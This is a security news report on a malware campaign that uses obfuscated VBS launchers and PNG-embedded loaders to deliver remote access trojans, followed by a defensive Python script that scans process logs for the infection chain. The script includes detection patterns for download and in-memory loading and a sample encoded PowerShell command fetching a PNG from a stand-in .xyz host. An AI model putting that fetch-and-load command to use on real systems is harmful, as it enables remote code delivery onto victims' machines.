Malware - Open Directory Campaign Uses Obfuscated VBS Files
In short: a new malware campaign uses obfuscated scripts and image files to get onto computers and hand attackers remote control.
A new malware campaign is using obfuscated VBS files and PNG-embedded loaders to deploy Remote Access Trojans (RATs). It is a multi-stage operation that puts organizations at risk, and prompt protective measures are needed to safeguard systems from these threats.
What Happened
A sophisticated malware campaign has emerged that uses obfuscated Visual Basic Script (VBS) files and PNG-embedded loaders to deploy Remote Access Trojans (RATs). This multi-stage attack was first detected in early 2026 during routine endpoint monitoring. What initially appeared to be a simple alert quickly unfolded into a well-organized operation, revealing a delivery framework capable of pushing various malware payloads from a single infrastructure.
The campaign began with a suspicious VBS file named Name_File.vbs, found in the \Users\Public\Downloads\ directory of a compromised system. SentinelOne's endpoint protection caught and quarantined the file, but the encoded content warranted further investigation. Analysts from LevelBlue discovered that this alert was just the tip of the iceberg, leading to the identification of multiple obfuscated VBS files linked to different malware payloads, including XWorm variants and Remcos RAT.
Who's Being Targeted
This malware campaign targets organizations that may not have stringent security measures in place. The attackers used infrastructure hosted on an attacker-controlled domain, news4me[.]xyz, which featured openly accessible directories. These directories served various roles, including staging VBS launchers and hosting obfuscated payload files. The campaign's design allows hosted payloads to be updated and expanded rapidly, making it a flexible and scalable threat.
The attackers' choice of using obfuscated scripts and PNG files allows them to bypass many traditional security measures. As organizations continue to rely on endpoint detection systems, the sophisticated nature of this campaign poses a significant risk to their security posture.
Signs of Infection
The infection mechanism begins with the VBS file, which acts as a launcher without containing active malicious code. Instead, it executes a Base64-encoded PowerShell command that fetches a PNG file from a remote server. This PNG file, seemingly innocuous, contains hidden malware that loads directly into memory, allowing the attackers to maintain a low profile.
Once executed, the malware downloads additional payloads, including an instance of Remcos RAT and a DLL designed to bypass User Account Control (UAC). This approach enables attackers to gain persistent access to compromised machines while leaving minimal traces on disk, complicating detection efforts for security teams.
How to Protect Yourself
Organizations should take immediate action to mitigate the risks posed by this malware campaign. Restricting the execution of VBS and BAT files from user-writable directories is crucial. Additionally, enforcing constrained PowerShell policies and enabling in-memory execution logging can help detect such threats early.
At the network level, blocking WebDAV connections and filtering out .xyz domains can limit access to the attacker's infrastructure. Organizations should not rely on endpoint protection alone but also carry out deeper threat intelligence investigations to uncover broader attack vectors. Stopping one alert is not enough when the underlying infrastructure remains active and ready to deploy new attacks.
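The infection chain described under "Signs of Infection" (a script host running a VBS from a user-writable directory, which spawns PowerShell with a Base64-encoded command that fetches a PNG) and the advice above to enable execution logging both point at the same detection: triage process-creation telemetry, decode the encoded PowerShell argument, and look for the download-of-an-image pattern. The following is an added example written for this page, not code from the article, from LevelBlue or from SentinelOne. The log records are constructed to mimic the chain; Name_File.vbs and the \Users\Public\Downloads\ path come from the article, while the hostname placeholder.xyz, the file loader.png, the scoring weights and the two benign records are assumptions.

```python
"""Triage process-creation records for the VBS -> encoded PowerShell -> PNG chain.

Added example, not the article's or the vendors' code. Sample events are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

ALERT_THRESHOLD = 3  # assumed weight at which a record becomes an alert

# Locations ordinary users can write to; the article recommends restricting script execution here.
USER_WRITABLE = ("\\users\\public\\", "\\downloads\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".bat", ".cmd")

# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand; the value is Base64 of a UTF-16LE string.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Indicators looked for in the decoded script: (pattern, weight, reason).
SCRIPT_INDICATORS = [
    (re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloaddata|downloadfile|net\.webclient", re.I),
     2, "remote download in decoded command"),
    (re.compile(r"https?://[^\s'\"]+\.(?:png|jpg|jpeg|gif|bmp)\b", re.I),
     2, "remote image file fetched (PNG loader pattern)"),
    (re.compile(r"https?://[^\s'\"/]+\.xyz\b", re.I), 1, ".xyz domain in decoded command"),
    (re.compile(r"reflection\.assembly\]::load|frombase64string", re.I),
     2, "in-memory assembly load or embedded payload decode"),
    (re.compile(r"davwwwroot|webdav", re.I), 1, "WebDAV reference in decoded command"),
]


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None

    @property
    def is_alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand value; None if it is not valid UTF-16LE Base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16 is always an even number of bytes
        return None
    return raw.decode("utf-16-le", errors="replace")


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand (used only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcessEvent) -> Finding:
    """Score one process-creation record against the two stages of the chain."""
    f = Finding()
    image, parent, cmd_lower = _basename(ev.image), _basename(ev.parent_image), ev.command_line.lower()

    # Stage 1: a script host running a VBS/BAT file out of a user-writable directory.
    if image in SCRIPT_HOSTS and any(e in cmd_lower for e in SCRIPT_EXTS) \
            and any(d in cmd_lower for d in USER_WRITABLE):
        f.score += 3
        f.reasons.append("script host executing script from user-writable directory")

    # Stage 2: PowerShell with an encoded command, typically spawned by the script host.
    if image in ("powershell.exe", "pwsh.exe"):
        if parent in SCRIPT_HOSTS:
            f.score += 2
            f.reasons.append(f"PowerShell spawned by script host {parent}")
        if HIDDEN_WINDOW.search(ev.command_line):
            f.score += 1
            f.reasons.append("hidden window requested")
        m = ENCODED_ARG.search(ev.command_line)
        if m:
            f.score += 1
            f.reasons.append("Base64-encoded command")
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                f.score += 1
                f.reasons.append("encoded argument does not decode cleanly")
            else:
                f.decoded_command = decoded
                for pattern, weight, reason in SCRIPT_INDICATORS:
                    if pattern.search(decoded):
                        f.score += weight
                        f.reasons.append(reason)
    return f


def triage(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, Finding]]:
    """Return (event, finding) pairs that reach the alert threshold, in log order."""
    out = []
    for ev in events:
        f = analyze(ev)
        if f.is_alert:
            out.append((ev, f))
    return out


# Constructed sample telemetry (not real campaign events).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'"C:\Windows\System32\wscript.exe" "C:\Users\Public\Downloads\Name_File.vbs"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(
                     "$d=(New-Object Net.WebClient).DownloadData('http://placeholder.xyz/loader.png')"),
                 r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # routine job, no alert
                 r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Backup\nightly.ps1"',
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # encoded but harmless
                 "powershell.exe -Enc " + encode_powershell("Get-Date | Out-File C:\\Temp\\ts.txt"),
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev, f in triage(SAMPLE_EVENTS):
        print(f"ALERT score={f.score} {_basename(ev.image)}: {'; '.join(f.reasons)}")
        if f.decoded_command:
            print("  decoded:", f.decoded_command)
```

Run against the constructed events, the VBS launch from \Users\Public\Downloads\ and the encoded PowerShell fetching a PNG from a .xyz host both alert, while the scheduled backup script and the harmless encoded one-liner do not. The decoded command is kept in the finding so an analyst can read what the launcher actually ran, which is the detail in-memory execution logging exists to surface.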
Cyber Security News